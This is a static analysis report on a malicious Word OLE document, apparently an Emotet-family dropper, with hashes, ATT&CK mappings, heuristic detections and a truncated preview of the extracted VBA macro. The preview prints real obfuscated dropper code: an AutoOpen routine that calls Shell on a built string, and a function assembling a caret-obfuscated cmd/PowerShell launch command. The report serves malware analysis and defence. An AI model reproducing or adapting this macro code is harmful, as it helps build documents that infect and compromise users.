Emooodldr — Office (OLE) malware analysis

Static analysis result for SHA-256 462c998cfc0302d9…

MALICIOUS

Office (OLE)

Size: 76.2 KB
Created: 2018-09-14 13:46:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 89c32fa0fe17d3d8af8160be5fee41b5
SHA-1: 64ab92620c4a0ad13871e8ad3851bbda675e21f0
SHA-256: 462c998cfc0302d939b7ff5defe9506c8c3710e2a7c10cd296b467e75ccd9bd2
Risk Score: 142

Malware Insights

Emooodldr · confidence 90%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as a malicious dropper by ClamAV, and heuristics indicate the presence of a legacy WordBasic AutoOpen macro. This macro is likely designed to download and execute a secondary payload, a common behavior for the Emooodldr family. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics (5)

  • ClamAV: Doc.Dropper.Emooodldr-6683857-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Emooodldr-6683857-0
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8407 bytes
SHA-256: a3bb893e2084c2d1ca8ec552679a32c2af9cb9cdd07b6ac03f975bc45489ae79
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "MSjtzMBKNuno"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim vGFXYV()
ReDim vGFXYV(5)
vGFXYV(0) = (31530 * DJKwzu / 64043 / akzqjp / tdYdCX * aATYnk)
vGFXYV(1) = 66667 * FZPwi / (44621 * MtasMs)
vGFXYV(2) = QkCFJ * tArOG / jJdbH / rafXbk / ZPRiC * 18828 / wJkjV * aXGFiA
vGFXYV(3) = (85439 * nUjRT) * VRltIS / kvcVpE
vGFXYV(4) = (OZZuGZ * UUZpa / (tlviNi * pjYra))

   Dim UzZKcs()
ReDim UzZKcs(2)
UzZKcs(0) = rIBba * TPXPwS * zDwwA * QGzwS * nKpUsn * 27229 / 72813 * qKcYN * 96940 * sWLXd / (mRzbJK * OtKirn)
UzZKcs(1) = (45292 * vfciho * 17518 * VZmTBO)

   Dim EBXhz()
ReDim EBXhz(4)
EBXhz(0) = 43111 / MLrwa / vsBVvm * 25734 * (jEwYfV * waupOP * 53849 / JFqKU)
EBXhz(1) = (36216 / jjZQKU) * (75763 * 46761 / TMTYwY / UBlOl)
EBXhz(2) = GMfTir / 31367 * 9861 / sRkXPw / 29585 * KKBCW * wDRkw / JjEKj * NkqqvI * rTCnYJ
EBXhz(3) = EqaEj / kJjPMG * iSJMa / 78725 / liTUOt / 30081

   Dim bdjtww()
ReDim bdjtww(4)
bdjtww(0) = NvoKt * AwLDia * 3646 / AuIGqG / 64110 / hUDnf
bdjtww(1) = rqvdvp * ztCpn / jMnsck / bibnGq * 42269 / NUGFu / FVIEi * bABFQ / Rzoub * DoRIOI / FTLmZ / jtjirf
bdjtww(2) = zYPahW / DYYXS / (85676 * CGqzHz / 62184 * sPObJ) * (64930 * lTzPn / 56966 / YrarmU)
bdjtww(3) = voTjQj / phkfHY * 62092 * 832 / (22332 * NounF)

   Dim tQtblR()
ReDim tQtblR(5)
tQtblR(0) = IAans / Bbipn * 7199 * KpMjW * ZXGpp / 61384 * 11288 * 51236 * 79300 * 98462
tQtblR(1) = (ijRzA / ABuhd * (qZGLEY * DJFLr * CKkHmd / cLKEm))
tQtblR(2) = JcMics / iQPjUB * 3313 * 70995 / (91731 / ZXZEw * 3611 / tHERP / (59798 / BZiPb * 82762 / cTvQlv * 1029 * lbbjBk))
tQtblR(3) = MVLawo * nfOlz * uWmJEj / DinMGP / (Wdpjd / TMIEAu * 73200 / jPBAv)
tQtblR(4) = tPpRb / 34759 * 76009 / iiwUji * KpfHVO / NhIKzo * 46004 * lLKzN * oXHLr * iaFjND * 19265 / ZWtaD

Shell@ knLAEj + JRUwFTwm + UqWRXvdXDmcc, Format(0)
   Dim UkpbU()
ReDim UkpbU(2)
UkpbU(0) = (97921 * XRVmZF / 32793 / AQWkz / (DUDar / ZSChU))
UkpbU(1) = jGDhl / cSlhEd / 89203 * uvOJm / (30488 * 33980 / 7495 * QmBdl)

   Dim iCoPSk()
ReDim iCoPSk(5)
iCoPSk(0) = CFhOpq * lKdSWi * TzIwzw * HPfjVb / 38120 * ihUZp * 36063 * pDiElm * (JJGSKL / jQUnO / (89214 * BhUPYh / 62270 / wwoQhK))
iCoPSk(1) = 8696 * sLsPG / (aDRIB / RzmaYv / 75209 / NpMEM)
iCoPSk(2) = (25890 / Jduir / (54509 * bcVfjf / RzQji / 57889 / (98203 * NrlXi * DznDs * QZXdJ)))
iCoPSk(3) = RXKFt * HPwrv / djLzP / 4672 * 87053 / 38062 / 88095 * YchbrU / ranXNM * AIwZQT
iCoPSk(4) = (11580 * DPZJz)

End Sub



Attribute VB_Name = "PnRAYKE"
Function knLAEj()

On _
Error _
Resume _
Next
Dim MARXnd()
ReDim MARXnd(3)
MARXnd(0) = lKSBv * ZzYwOX * 20981 * WwdoLw / 90013 / cEjrP / JbjJwo * 67282 / (KKRzs / 18106 * iWbnEp * oicfb * (hNVDYo / wPFaVE))
MARXnd(1) = 20101 * SXNFlJ / 95915 * 65564 / 9939 / LvEnA * 62952 * NDizo / 26254 / EUzPR * 814 / zfTVK
MARXnd(2) = (29473 / pWkfQ * NtjJPY / 17221 / 15814 / fodKo)

LIGVHvNtcl = Format(Chr(11 + 13 + 4 + 15 + 56)) + "md /V^:^O/" + Format(Chr(8 + 9 + 3 + 10 + 37)) + Format(Chr(3 + 4 + 1 + 5 + 21)) + "s^e^t ^m^5J=   " + "^ ^ ^ ^" + " ^ ^ ^" + "  ^ ^  ^ ^  " + "}^}{^h" + Format(Chr(11 + 13 + 4 + 15 + 56)) + "t^a" + Format(Chr(11 + 13 + 4 + 15 + 56)) + "};^ka^erb^;^jw" + "^m$ me^" + "tI^-e^kovnI;)j^w^m^$^ " + "^,zM^s$(el"
Dim iQEmL()
ReDim iQEmL(2)
iQEmL(0) = lRpRs * huSYO / KkqAs * JzzirA / XZLBOL / BdwrZ
iQEmL(1) = 14228 / kUlVF * 92136 / qfThYN / OQGaoq / wVsDN / 1906 * hmzak * 51993 * dNImE / jtsTpw / nMrRkR

   Dim GjjGZ()
ReDim GjjGZ(5)
GjjGZ(0) = qNciEs * LOrwdI / (68274 * 49846 * LWcuPz / ZIbnz)
GjjGZ(1) = 28343 / wcFsFj / (FCOas / 10635)
GjjGZ(2) = ZfpNs / VMifi / (sCVdEj / jsVYPi)
GjjGZ(3) = WFUNUW / DAdmaE / 86727 * mwaJM / MjZJqv / ZEHZj * 97854 / PsRKLB * 78644 * sriiD
GjjGZ(4) = 38565 * WwFSF * 19829 * uDibS / wWMqFt * uhPwKz / 19756 * ifLrFT

   Dim zsSsuS()
... (truncated)